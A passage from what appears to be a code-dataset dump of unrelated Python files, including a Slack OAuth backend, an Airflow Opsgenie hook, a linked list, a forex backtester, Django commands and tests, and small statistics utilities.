delete_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n for endpoint in ctx.get(\"endpoints\"):\n endpoint.delete()\n\n ctx.set_purged()\n\n def update_resource(self, ctx, changes: dict, resource: resources.PurgeableResource) -> None:\n service = ctx.get(\"service\")\n endpoints = ctx.get(\"endpoints\")\n\n for k, v in EndpointHandler.types.items():\n if k not in endpoints:\n self._keystone.endpoints.create(service, url=getattr(resource, v), region=resource.region, interface=k)\n ctx.set_created()\n\n elif v in changes:\n self._keystone.endpoints.update(endpoints[k], url=getattr(resource, v))\n ctx.set_updated()\n","sub_path":"plugins/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":72930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"190573182","text":"\"\"\"\nSlack OAuth2 backend, docs at:\n http://psa.matiasaguirre.net/docs/backends/slack.html\n https://api.slack.com/docs/oauth\n\"\"\"\nimport re\n\nfrom social.backends.oauth import BaseOAuth2\n\n\nclass SlackOAuth2(BaseOAuth2):\n \"\"\"Slack OAuth authentication backend\"\"\"\n name = 'slack'\n AUTHORIZATION_URL = 'https://slack.com/oauth/authorize'\n ACCESS_TOKEN_URL = 'https://slack.com/api/oauth.access'\n ACCESS_TOKEN_METHOD = 'POST'\n SCOPE_SEPARATOR = ','\n REDIRECT_STATE = True\n EXTRA_DATA = [\n ('id', 'id'),\n ('name', 'name'),\n ('real_name', 'real_name')\n ]\n\n def get_user_details(self, response):\n \"\"\"Return user details from Slack account\"\"\"\n # Build the username with the team $username@$team_url\n # Necessary to get unique names for all of slack\n match = re.search(r'//([^.]+)\\.slack\\.com', response['team_url'])\n username = '{0}@{1}'.format(response.get('name'), match.group(1))\n return {\n 'username': username,\n 'email': response['profile'].get('email', ''),\n 'fullname': response['profile'].get('real_name'),\n 'first_name': response['profile'].get('first_name'),\n 'last_name': response['profile'].get('last_name')\n }\n\n def user_data(self, access_token, *args, **kwargs):\n \"\"\"Loads user data from service\"\"\"\n # Has to be two calls, because the users.info requires a username,\n # And we want the team information\n # https://api.slack.com/methods/auth.test\n auth_test = self.get_json('https://slack.com/api/auth.test', params={\n 'token': access_token\n })\n\n # https://api.slack.com/methods/users.info\n data = self.get_json('https://slack.com/api/users.info', params={\n 'token': access_token,\n 'user': auth_test.get('user_id')\n })\n # Inject the team data\n out = data['user'].copy()\n out['team_id'] = auth_test.get('team_id')\n out['team'] = auth_test.get('team')\n out['team_url'] = auth_test.get('url')\n return out\n","sub_path":"social/backends/slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"288432018","text":"class Node:\n def __init__(self, initdata):\n self.data = initdata\n self.next = None\n \n def getData(self):\n return self.data\n \n def getNext(self):\n return self.next\n \n def setData(self, data):\n self.data = data\n \n def setNext(self, next):\n self.next = next\n\nclass UnorderedList:\n def __init__(self):\n self.head = None\n \n def isEmpty(self):\n return self.head == None\n \n def add(self, item):\n temp = Node(item)\n temp.setNext(self.head)\n self.head = temp\n \n def length(self):\n current = self.head\n count = 0\n while current != None:\n count = count + 1\n current = current.getNext()\n return count\n \n def search(self, item):\n current = self.head\n found = False\n while current != None and not found:\n if current.getData() == item:\n found = True\n else:\n current = current.getNext()\n return found\n \n def remove(self, item):\n previous = None\n current = self.head\n remove = False\n while not remove:\n if current.getData() == item:\n remove = True\n else:\n previous = current\n current = current.getNext()\n if remove:\n if previous is None:\n self.head = current.getNext()\n else:\n previous.setNext(current.getNext())\n return remove\n \n def append(self, item):\n current = self.head\n if current is None:\n self.head = Node(item)\n else:\n while current.getNext() != None:\n current = current.getNext()\n current.setNext(Node(item))\n \n def insert(self, index, item):\n current = self.head\n if current is None:\n self.head = Node(item)\n else:\n listLength = self.length()\n if index > listLength:\n self.append(item)\n else:\n i = 1\n while i < index - 1:\n current = current.getNext()\n i = i + 1\n nextNode = current.getNext()\n current.setNext(Node(item))\n current.getNext().setNext(nextNode)\n \n def index(self, index):\n current = self.head\n listLength = self.length()\n if index > listLength:\n return None\n else:\n i = 1\n while i < index:\n current = current.getNext()\n i = i + 1\n return current.getData()\n \n def pop(self):\n current = self.head\n if current != None:\n self.head = current.getNext()\n return current.getData()\n\n def showList(self):\n current = self.head\n while current != None:\n print(current.getData())\n current = current.getNext()\n\nulist = UnorderedList()\nulist.append(10)\nulist.append(12)\nulist.append(4)\nulist.append(11)\n\nulist.remove(4)\n\nulist.insert(6, 4)\nulist.showList()\nprint(ulist.index(3))\n","sub_path":"数据结构与算法/unorderedlist.py","file_name":"unorderedlist.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"109695944","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/contrib/hooks/opsgenie_alert_hook.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 3202 bytes\nimport json, requests\nfrom airflow.hooks.http_hook import HttpHook\nfrom airflow import AirflowException\n\nclass OpsgenieAlertHook(HttpHook):\n \"\"\"OpsgenieAlertHook\"\"\"\n\n def __init__(self, opsgenie_conn_id='opsgenie_default', *args, **kwargs):\n (super(OpsgenieAlertHook, self).__init__)(args, http_conn_id=opsgenie_conn_id, **kwargs)\n\n def _get_api_key(self):\n \"\"\"\n Get Opsgenie api_key for creating alert\n \"\"\"\n conn = self.get_connection(self.http_conn_id)\n api_key = conn.password\n if not api_key:\n raise AirflowException('Opsgenie API Key is required for this hook, please check your conn_id configuration.')\n return api_key\n\n def get_conn(self, headers=None):\n \"\"\"\n Overwrite HttpHook get_conn because this hook just needs base_url\n and headers, and does not need generic params\n\n :param headers: additional headers to be passed through as a dictionary\n :type headers: dict\n \"\"\"\n conn = self.get_connection(self.http_conn_id)\n self.base_url = conn.host if conn.host else 'https://api.opsgenie.com'\n session = requests.Session()\n if headers:\n session.headers.update(headers)\n return session\n\n def execute(self, payload={}):\n \"\"\"\n Execute the Opsgenie Alert call\n\n :param payload: Opsgenie API Create Alert payload values\n See https://docs.opsgenie.com/docs/alert-api#section-create-alert\n :type payload: dict\n \"\"\"\n api_key = self._get_api_key()\n return self.run(endpoint='v2/alerts', data=(json.dumps(payload)),\n headers={'Content-Type':'application/json', \n 'Authorization':'GenieKey %s' % api_key})","sub_path":"pycfiles/apache_ariatosca-0.2.0-py2-none-any/opsgenie_alert_hook.cpython-36.py","file_name":"opsgenie_alert_hook.cpython-36.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"450882184","text":"from django.test import TestCase\nfrom ..mqtt import getClient\nfrom django.utils.timezone import now\nfrom Sensor.models import Sensor, SensorData\nfrom Testutil.Setup import SetupEmbeddedNode, SetupSensor\nimport time\n\n\nclass testDataPipe(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.MQTTClient = getClient()\n cls.MQTTClient.loop_stop()\n cls.MQTTClient.loop_start()\n\n @classmethod\n def tearDownClass(cls):\n client = getClient()\n client.loop_stop()\n\n def setUp(self):\n SetupEmbeddedNode()\n SetupSensor()\n\n def testSingleton(self):\n \"\"\"\n 测试MQtt对象单例类特性\n :return:\n \"\"\"\n client = getClient()\n self.assertEqual(client, self.MQTTClient)\n\n def testMQttDataUpload(self):\n \"\"\"\n 测试传感器数据上行\n :return:\n \"\"\"\n sensorObj = Sensor.objects.all().first() # type:Sensor\n payload = {\n \"type\": \"sensor\",\n \"UUID\": sensorObj.Node.UUID,\n \"payload\": {\n \"timestamp\": now().isoformat(),\n \"value\": \"-1\",\n \"sensorId\": sensorObj.SensorID\n }\n }\n\n for i in range(0, 5):\n self.MQTTClient.publish('testHome/data', payload=payload.__str__().replace(\"'\", '\"'))\n\n time.sleep(0.5)\n\n self.assertEqual(SensorData.objects.all().count(), 0)\n","sub_path":"src/DataPipe/TestUtil/testDatapipe.py","file_name":"testDatapipe.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"212810413","text":"# how to backtest:\n# how to provide data\n\nfrom Authenticate import Auth\nfrom find_signals import find_signal\nfrom order_execution import manage_position\nfrom utility_funcs import build_df\nfrom sklearn import preprocessing\nfrom sklearn.externals import joblib\nfrom keras.models import load_model\nimport oandapyV20.endpoints.instruments as instruments\nimport oandapyV20\nimport numpy as np\nimport argparse\nimport os\nimport logging\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nformatter = logging.Formatter('%(levelname)s - %(message)s')\ndef setup_logger(name, log_file, level=logging.INFO):\n\n handler = logging.FileHandler(log_file) \n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger\n\n# general process logger\nlogger = setup_logger('first_logger', 'back_test.log')\n\n# -----------------------------------------------------------------------------\n# class Test\n# store information for backtesting and provide relative functions\n# class test should be replacable for Account and Trade\n# -----------------------------------------------------------------------------\nclass Test():\n\t\n\t# initialization and class variables\n\t# -------------------------------------------------------------------------\n\tdef __init__(self):\n\t\tself.account_ID, self.access_token = Auth()\n\t\tself.client = oandapyV20.API(access_token=self.access_token)\n\t\t\n\t\t# set of currency pairs we are interested in\n\t\tself.pair_list = ['EUR_USD', 'EUR_GBP', 'USD_CHF', 'GBP_USD', 'USD_JPY', \n\t\t\t\t\t\t'AUD_USD', 'USD_CAD', 'EUR_JPY', 'EUR_NZD', 'USD_HKD', 'EUR_SGD', \n\t\t\t\t\t\t'AUD_CAD', 'AUD_CHF', 'AUD_NZD', 'CAD_CHF', 'CAD_JPY', 'CHF_JPY', \n\t\t\t\t\t\t'EUR_AUD', 'EUR_CAD', 'EUR_CHF', 'GBP_HKD', 'GBP_JPY', 'USD_DKK',\n\t\t\t\t\t\t'USD_THB', 'EUR_CZK']\n\n\t\t# load ml models and scalers to make predictions\n\t\tself.H4_BR_model = load_model('H4_DNN_Breakout')\n\t\tself.H1_BR_model = load_model('H1_DNN_Breakout')\n\t\tself.H4_SELL_model = load_model('H4_SELL_OPT')\n\t\tself.H1_SELL_model = load_model('H1_SELL_OPT')\n\t\tself.H4_BR_scaler = joblib.load('H4_BR_scaler.save')\n\t\tself.H1_BR_scaler = joblib.load('H1_BR_scaler.save')\n\t\tself.H4_SELL_scaler = joblib.load('H4_SELL_scaler.save')\n\t\tself.H1_SELL_scaler = joblib.load('H1_SELL_scaler.save')\n\n\t\t# position and trade information\n\t\tself.open_positions = {} # keep track of open positions\n\t\tself.prediction = {}\n\t\tself.trades = {} # more specific to trade values\n\t\tself.stops = {} # stop price for given order ID\n\t\tself.waiting = {}\n\t\tself.ml_waiting = {}\n\t\tself.ml_data = {} # ml data for all orders, contains label if order ended in profit\n\t\tself.waiting_len = 0\n\t\tself.stopped = 0\n\t\tself.mv_stopped = 0\n\t\tself.obv_slope = np.array([])\n\n\t\tself.trade_count = 0 # the current number of trades open\n\t\tself.total_trades = 0 # the total number of trades made\n\t\tself.last_ID = 0\n\t\tself.max_trade_count = 15\n\t\tself.balance = 10000\n\t\tself.min_balance_reached = 10000\n\t\tself.low = 0\n\t\tself.losing_tades = {}\n\t\tself.worst_trade = {}\n\t\tself.worst_trade[0] = '', '', ''\n\t\t\n\t\t# find optimized leverage\n\t\tself.lev_range = {}\n\t\tself.lev_range[\"H4\"] = .04, .065\n\t\tself.lev_range[\"H1\"] = .03, .055\n\t\tself.avg_lev = 0\n\t\tself.lev_boost = 0.06\n\t\tself.margin = 10000\n\t\tself.realized_profit = 0\n\n\t\t# data information\n\t\tself.lookBack = 730\n\t\tself.data = {}\n\t\tself.begin = {}\n\t\tself.end = {}\n\t\tself.init_interval()\n\n\t\n\t# class methods\n\t# -------------------------------------------------------------------------\n\tdef init_interval(self):\n\t\tfor frame in [\"H1\", \"H4\", \"D\"]:\n\t\t\tself.begin[frame] = 0\n\t\t\tself.end[frame] = 60\n\n\t# change the way we get data in order to get more candles\n\t# use from/to notation\n\tdef api_data(self, frame):\n\t\tcount = 0\n\n\t\tif frame==\"H1\":\n\t\t\tcount = self.lookBack*24\n\t\telif frame==\"H4\":\n\t\t\tcount = self.lookBack*6\n\t\telif frame==\"D\":\n\t\t\tcount = self.lookBack\n\n\t\tparams = {\n\t \"count\": count, \n\t \"granularity\": frame}\n\n\t\tfor pair in self.pair_list:\n\t\t\tr = instruments.InstrumentsCandles(instrument=pair, params=params)\n\t\t\tself.client.request(r) # request data\n\n\t\t\ttime, vol, op, high, low, close = build_df(r)\n\t\t\tself.data[pair] = close, low, high, op, vol, time # hashtable with key=pair, val=candle data\n\n\tdef api_date_range_data(self, frame):\n\n\t\tTime = np.array([])\n\t\tVol = np.array([])\n\t\tOpin = np.array([])\n\t\tHigh = np.array([])\n\t\tLow = np.array([])\n\t\tClose = np.array([])\n\n\t\tprint(\"< retrieving data, this may take a minute\")\n\t\tfor pair in self.pair_list:\n\t\t\tyear = 2017\n\t\t\tmonth = -1\n\t\t\tdat = '01T00'\n\t\t\tfor date_range in range(0, 12):\n\n\t\t\t\tif month == 12: \n\t\t\t\t\tmonth = 2\n\t\t\t\t\tyear += 1\n\t\t\t\telif month == 11:\n\t\t\t\t\tmonth = 1\n\t\t\t\t\tyear += 1\n\t\t\t\telse: \n\t\t\t\t\tmonth += 2\n\n\t\t\t\tdate_begin = str(year)+'-'+str(month)+'-'+dat # our start date\n\n\t\t\t\tparams = {\n\t\t\t\t\t\"from\": date_begin,\n\t\t\t\t\t\"count\": 360,\n\t\t\t\t\t\"granularity\": frame}\n\n\t\t\t\tr = instruments.InstrumentsCandles(instrument=pair, params=params)\n\t\t\t\tself.client.request(r)\n\n\t\t\t\ttime, vol, op, high, low, close = build_df(r)\n\t\t\t\tTime = np.append(Time, time)\n\t\t\t\tVol = np.append(Vol, vol)\n\t\t\t\tOpin = np.append(Opin, op)\n\t\t\t\tHigh = np.append(High, high)\n\t\t\t\tLow = np.append(Low, low)\n\t\t\t\tClose = np.append(Close, close)\n\n\t\t\tself.data[pair] = Close, Low, High, Opin, Vol, Time\n\t\tprint(\"< complete\")\n\t\n\t# interacts with find_signals\n\tdef get_data(self, frame, pair):\n\t\tclose, low, high, op, vol, time = self.data[pair]\n\t\tif self.end[frame] >= len(vol)-1: #specific to D, need to change\n\t\t\tempty = np.array([])\n\t\t\treturn empty, empty, empty, empty, empty, empty\n\n\t\t# cant slice candles data\n\t\ttime_ = time[self.begin[frame]:self.end[frame]]\n\t\tvol_ = vol[self.begin[frame]:self.end[frame]]\n\t\topen_ = op[self.begin[frame]:self.end[frame]]\n\t\thigh_ = high[self.begin[frame]:self.end[frame]]\n\t\tlow_ = low[self.begin[frame]:self.end[frame]]\n\t\tclose_ = close[self.begin[frame]:self.end[frame]]\n\n\t\treturn time_, vol_, open_, high_, low_, close_\n\n\tdef update_data(self, frame):\n\t\tself.begin[frame] += 1\n\t\tself.end[frame] += 1\n\n\tdef set_age(self, ID, delta):\n\t\tpair, frame, rg, age = self.open_positions[ID]\n\n\t\tself.open_positions[ID] = pair, frame, rg, (age + delta)\n\n\t# intacts with manage_positions\n\t# return hashtable of open positions\n\tdef openPositions(self):\n\t\treturn self.open_positions\n\n\tdef possible_trade(self, pair, frame, prediction, rg, o_slope, p_slope, obv, cycle, lev):\n\t\twaiting_str = pair+\",\"+frame\n\t\tself.waiting[waiting_str] = [0, pair, frame, prediction, rg, lev]\n\t\tself.waiting_len += 1\n\n\tdef Waiting(self):\n\t\treturn self.waiting\n\n\t# interacts with find_signals\n\tdef getBalance(self):\n\t\treturn self.margin\n\n\t# interacts with find_signals\n\t# see if we already have the trade\n\tdef can_trade(self, Account, pair, frame):\n\t\ttrade_count = self.trade_count\n\t\tif trade_count >= self.max_trade_count:\n\t\t\treturn False\n\n\t\tpositions = self.openPositions()\n\t\tfor ID in positions:\n\t\t\topen_pair, open_frame, rg, age = positions[ID]\n\t\t\t\n\t\t\topen_pair = open_pair.strip()\n\t\t\topen_frame = open_frame.strip()\n\t\t\tpair = pair.strip()\n\t\t\tframe = frame.strip()\n\n\t\t\tif open_pair==pair and open_frame==frame:\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef end_waiting(self, w_str):\n\t\tdel self.waiting[w_str]\n\t\t#del self.ml_waiting[w_str]\n\n\t# set the buy price of pair: trades[ID] = currprice, units\n\t# set the stop price for pair: stops[pair] = stop_price\n\t# set open_positions[pair] = ID, frame: generate ID, last_ID+1\n\t# update balance\n\tdef stop_loss_trade(self, Account, units, pair, stop_price, frame, last_price, rg):\n\t\tID = self.last_ID + 1\n\t\tself.last_ID += 1\n\n\t\tself.trades[ID] = last_price, units\n\t\tself.open_positions[ID] = pair, frame, rg, 0\n\t\tself.prediction[ID] = 1\n\t\tself.stops[ID] = stop_price\n\t\tself.trade_count += 1\n\t\tself.total_trades += 1\n\n\t\ttime, vol, op, high, low, close = self.get_data(frame, pair)\n\t\tif close[-1] != last_price:\n\t\t\tprint(close[-1], \" -- \", last_price)\n\t\t\tprint(\"ERROR\")\n\t\t\texit()\n\n\t\tprint(\"< BUY ORDER:------------------------------------------------\")\n\t\tprint(\"< trade placed at\", time[-1])\n\t\tprint(\"< pair:\", pair, \" -- frame:\", frame)\n\t\tprint(\"< order price:\", last_price)\n\t\tprint(\"< stop_price:\", stop_price)\n\t\tprint(\"------------------------------------------------------------\")\n\n\t\tself.margin = (self.balance - (units*last_price)/50)\n\n\t# manage all stop losses\n\tdef manage_stops(self):\n\t\tfor ID in list(self.open_positions):\n\t\t\tpair, frame, rg, age = self.open_positions[ID]\n\t\t\tstop_p = self.stops[ID]\n\t\t\tend_interval = self.end[frame]-1\n\t\t\tclose, low, high, op, vol, time = self.data[pair]\n\t\t\tcurr_p = close[end_interval]\n\n\t\t\tif curr_p <= stop_p:\n\t\t\t\tself.close_position(self, ID, curr_p)\n\t\t\t\tself.stopped += 1\n\n\t# interacts with manage_positions\n\t# add to realized profit by calling update profit\n\t# delete positions[pair], trades[pair], stops[pair]\n\tdef close_position(self, Account, ID, last_price):\n\t\t\n\t\tpair, frame, rg, age = self.open_positions[ID]\n\t\ttime, vol, op, high, low, close = self.get_data(frame, pair)\n\n\t\tif last_price != close[-1]:\n\t\t\tprint(\"ERROR---------------------------\")\n\n\t\tb_price, units = self.trades[ID]\n\t\tval1 = b_price*units\n\t\tval2 = last_price*units\n\n\t\tself.realized_profit += (val2-val1) # add to profit, could be negative\n\t\tself.trade_count -= 1\n\t\tself.balance += (val2-val1)\n\t\tself.margin = self.balance\n\t\tself.mv_stopped += 1\n\n\t\tif self.balance < self.min_balance_reached:\n\t\t\tself.min_balance_reached = self.balance\n\t\t\tself.low = self.total_trades\n\n\t\tif (val2-val1) < 0:\n\t\t\tself.losing_tades[ID] = time[-1], pair, frame\n\n\t\tprint(\"< CLOSE ORDER:----------------------------------------------\")\n\t\tprint(\"< order placed at\", time[-1])\n\t\tprint(\"< pair:\", pair, \" -- frame:\", frame)\n\t\tprint(\"< close price:\", last_price)\n\t\tprint(\"------------------------------------------------------------\")\n\n\t\tdel self.trades[ID]\n\t\tdel self.open_positions[ID]\n\t\tdel self.prediction[ID]\n\t\tdel self.stops[ID]\n\n\tdef init_write(self):\n\t\topen('sell_time.csv', 'w').close()\n\t\twith open('sell_time.csv', 'a') as f_writer:\n\t\t\t\n\t\t\tln = \"ID,rg,h,l,c1,c2,c3,supp,o_s,p_s,obv1,obv2,obv3,rsi1,rsi2,rsi3,natr,cyc,stF,stS,rsi,obv,natrF,alF, alS,fC\\n\"\n\t\t\tf_writer.write(ln)\n\t\t\tf_writer.close()\n\t\n\tdef write_data(self, ID, data):\n\t\twith open('sell_time.csv', 'a') as f_writer:\n\t\t\t\n\t\t\tln = str(ID) + \",\"\n\t\t\tfor item in data:\n\t\t\t\tif item == data[-1]:\n\t\t\t\t\tln += str(item) + \"\\n\"\n\t\t\t\telse:\n\t\t\t\t\tln += str(item) + \",\"\n\n\t\t\tf_writer.write(ln)\n\t\t\tf_writer.close()\n\n\t# print account summary\n\tdef account_summary(self):\n\t\tprint(\"\\nTotal trades:\", self.total_trades)\n\t\tprint(\"Realized profit:\", self.realized_profit)\n\t\tprint(\"Account value:\", self.balance)\n\t\tif self.total_trades == 0:\n\t\t\tprint(\"Trade num to profit ratio: 0\")\n\t\telse:\n\t\t\tprint(\"Trade num to profit ratio:\", self.realized_profit/self.total_trades)\n\t\tprint(\"Return %:\", (self.realized_profit/10000)*100)\n\t\t\n\t\tprint(\"Open positions:\", self.trade_count)\n\t\tpos_val = 0\n\t\tfor ID in list(self.open_positions):\n\t\t\t#print(\"open position\")\n\t\t\tpair, frame, rg, age = self.open_positions[ID]\n\t\t\tclose, low, high, op, vol, time = self.data[pair]\n\t\t\tlast_price = close[-1]\n\n\t\t\tb_price, units = self.trades[ID]\n\t\t\t#print(\"buy price:\", b_price, \" | last price: \", last_price)\n\t\t\tval1 = b_price*units\n\t\t\tval2 = last_price*units\n\t\t\tpos_val += (val2-val1)\n\n\t\tprint(\"Position value:\", pos_val)\n\t\tprint(\"Stopped trades:\", self.stopped)\n\t\tprint(\"Closed trades:\", self.mv_stopped)\n\t\tprint(\"Number of possible trades:\", self.waiting_len)\n\t\tprint(\"Min account balance:\", self.min_balance_reached)\n\t\tprint(\"Reached after\", self.low, \"trades\")\n\t\tprint(\"Negative trade count:\", len(self.losing_tades))\n\t\t#print(\"average leverage:\", self.avg_lev / self.total_trades)\n\t\tprint(\"Negative trades:\")\n\t\tfor ID in self.losing_tades:\n\t\t\ttime, pair, frame = self.losing_tades[ID]\n\t\t\tprint(pair, \"-\", frame, \" at \", time)\n\n\n\n\n# -----------------------------------------------------------------------------\n# program execution starts\n# look for buy and selling signals then sleep \n# -----------------------------------------------------------------------------\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(description='backtest')\n\tparser.add_argument('--frame', required=True, dest=\"frame\", metavar='NAME', \n\t\thelp='Which chart time to test: H1; H4; D')\n\n\targs = parser.parse_args() \n\tchart_time = args.frame\n\n\tTEST = Test() # get an instance of the test class\n\n\tprint(\"/////////////////////////////////////////////////////////////////////////\")\n\tprint(\"// initializing backtesting program\")\n\tprint(\"// look back is\", TEST.lookBack, \"days\")\n\tprint(\"/////////////////////////////////////////////////////////////////////////\\n\")\n\n\tTEST.init_write()\n\n\tif chart_time == \"H1\":\n\t\t# run backtest for highest frequency chart time\n\t\tprint(\"< running backtest on H1 candles\")\n\t\tTEST.api_data(\"H1\") # update the price data \n\t\tlength = (TEST.lookBack*24 - 60) # hourly candles * 24 to get day\n\t\tfor itr in range(0, length):\n\t\t\tfind_signal(TEST, TEST, \"H1\") # pass frame as parameter\n\t\t\tTEST.manage_stops()\n\t\t\tmanage_position(TEST, TEST, logger)\n\t\t\tTEST.update_data(\"H1\")\n\n\t\tprint(\"< backtest complete, print account summary:\")\n\t\tprint(\"-------------------------------------------------------------------------\")\n\t\tTEST.account_summary()\n\n\telif chart_time == \"H4\":\n\t\t# run backtsest for medium frequency chart time\n\t\tprint(\"< running backtest on H4 candles\")\n\t\tTEST.api_data(\"H4\") # update the price data\n\t\tlength = (TEST.lookBack*6 - 60) # 4 hour candles * 6 to get day\n\t\tprint(\"< number of candles:\", length, \"\\n\")\n\t\tfor itr in range(0, length):\n\t\t\tfind_signal(TEST, TEST, \"H4\") # pass frame as parameter\n\t\t\tTEST.manage_stops()\n\t\t\tmanage_position(TEST, TEST, logger)\n\t\t\tTEST.update_data(\"H4\")\n\n\t\tprint(\"< backtest complete, print account summary:\")\n\t\tprint(\"-------------------------------------------------------------------------\")\n\t\tTEST.account_summary()\n\n\telif chart_time == \"D\":\n\t\t# run backtest for lowest frequency chart time\n\t\tprint(\"< running backtest on D candles\")\n\t\tTEST.api_data(\"D\") # update the price data\n\t\tlength = (TEST.lookBack - 60) # daily candles\n\t\tfor itr in range(0, length):\n\t\t\tfind_signal(TEST, TEST, \"D\") # pass frame as parameter\n\t\t\tTEST.manage_stops()\n\t\t\tmanage_position(TEST, TEST)\n\t\t\tTEST.update_data(\"D\")\n\n\t\tprint(\"< backtest complete, print account summary:\")\n\t\tprint(\"-------------------------------------------------------------------------\")\n\t\tTEST.account_summary()\n\n\n\n\n\n\n\n\n","sub_path":"currency_trading/back_test.py","file_name":"back_test.py","file_ext":"py","file_size_in_byte":14431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"496712188","text":"# -*- coding: utf-8 -*-\nfrom django.core.management.base import BaseCommand, CommandError\nfrom olist.models import Category, Channel\n\nclass Command(BaseCommand):\n help = \"Imports categories\"\n\n def add_arguments(self, parser):\n parser.add_argument('arguments', nargs='+', type=str)\n\n\n def handle(self, *args, **options):\n if len(options['arguments']) == 2:\n channel_name = options['arguments'][0]\n filename = options['arguments'][1]\n self.import_categories(channel_name, filename)\n \n\n def import_categories(self, channel_name, filename):\n \"\"\"\n Import categories to the database.\n\n Args:\n channel_name (str): The name of the channel that owns the categories.\n filename (str): Path to the file containing the categories to be imported.\n \"\"\"\n \n channel, channel_created = Channel.objects.get_or_create(name=channel_name)\n \n if channel_created:\n print(\"Channel {0} created.\".format(channel_name))\n else:\n print(\"Channel {0} updated.\".format(channel_name))\n\n file = open(filename, 'r').readlines()\n \n for row in file:\n categories = row.strip().split('/')\n parent = None\n\n for category in categories:\n category_obj, category_created = Category.objects.get_or_create(name=category.strip(), channel=channel, parent=parent)\n\n if category_created:\n if parent is None:\n print(\"Category {0} created.\".format(category.strip()))\n else: \n print(\"Category {0}->{1} created.\".format(parent.name, category.strip()))\n else:\n if parent is None:\n print(\"Category {0} updated.\".format(category.strip()))\n else: print(\"Category {0}->{1} updated.\".format(parent.name, category.strip()))\n\n parent = category_obj\n \n","sub_path":"work-at-olist/olist/management/commands/importcategories.py","file_name":"importcategories.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"417044525","text":"from name_function import get_formated_name\n\n\ndef main():\n print(\"Enter 'q' for any time to quit\\n\")\n while True:\n first_name = input(\"Enter first name: \")\n if first_name == \"q\":\n break\n last_name = input(\"Enter last name: \")\n if last_name == \"q\":\n break\n print(get_formated_name(first_name, last_name))\n\n\nif __name__ == \"__main__\":\n main()\n ","sub_path":"python tasks/testing/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"304153612","text":"from unittest import TestCase\n\nimport numpy as np\nimport pandas as pd\nimport pycr\nfrom scipy import stats\n\n\nclass test_pcr_ttest(TestCase):\n def test_pcr_ttest(self):\n ct1 = pd.read_csv('pycr/ct1.csv')\n group = np.repeat(['brain', 'kidney'], 6)\n\n d = pycr.pcr_ttest(ct1, group, 'GAPDH', 'brain')\n self.assertIs(d.empty, False)\n self.assertEqual(d.shape, (1, 3))\n\nclass test_pcr_wilcoxon(TestCase):\n def test_pcr_wilcoxon(self):\n ct1 = pd.read_csv('pycr/ct1.csv')\n group = np.repeat(['brain', 'kidney'], 6)\n\n d = pycr.pcr_wilcoxon(ct1, group, 'GAPDH', 'brain')\n self.assertIs(d.empty, False)\n self.assertEqual(d.shape, (1, 3))\n","sub_path":"pycr/tests/test_testing.py","file_name":"test_testing.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"423381501","text":"import numpy as np\r\nfrom misc import grouping\r\n#ungrouped mean\r\ndef no_freq_mean(X):\r\n np.mean(X)\r\n \r\n# mean when frequency given\r\ndef freq_mean(X,freq): \r\n XF = X*freq\r\n mean = np.sum(XF)/np.sum(freq)\r\n info = {'freq':freq,'mean':mean,\"XF\":XF}\r\n return info\r\n\r\n#shortcut mean\r\ndef range_mean(X,freq,A =None):\r\n if A== None: A = np.median(X)\r\n D =X - A\r\n FD = D * freq\r\n mean = float(A)+float(np.sum(FD))/np.sum(freq)\r\n info = {'A':A,'freq':freq,'D':D,'FD':FD,'mean':mean}\r\n return info\r\n\r\n#weighted mean\r\ndef weighted_mean(X,weights):\r\n WX = X * weights\r\n mean = np.sum(WX)/np.sum(weights)\r\n info = {'weights':weights,'mean':mean,\"WX\":WX}\r\n return info\r\n\r\n#step deviation\r\ndef step_deviation(X,freq,A = None):\r\n if A== None: A = np.median(X) \r\n h = X[1]-X[0]\r\n U = (X - A)/h\r\n FU_fr = freq*U\r\n sum_FU = np.sum(FU_fr)\r\n sum_freq= np.sum(freq)\r\n mean = A + h * sum_FU/sum_freq\r\n info = {'X':X,'F':freq,'A':A,'U = (X - A)/h':U,'F*U':FU_fr,'mean':mean}\r\n return info ","sub_path":"mean.py","file_name":"mean.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"261498447","text":"from domain.NABException import NABException\nfrom domain.Person import Person\nfrom repository.PersonRepository import PersonRepository\nfrom repository.PersonFileRepository import PersonFileRepository\nfrom controller.ChangeHistory import *\nfrom copy import deepcopy\n\n\nclass PeopleController:\n \"\"\"\n Class used for handling the operations regarding people.\n \"\"\"\n\n def __init__(self, personRepo):\n '''\n Constructor for the class PeopleController.\n :param personRepo: PersonRepository - repository containing people\n 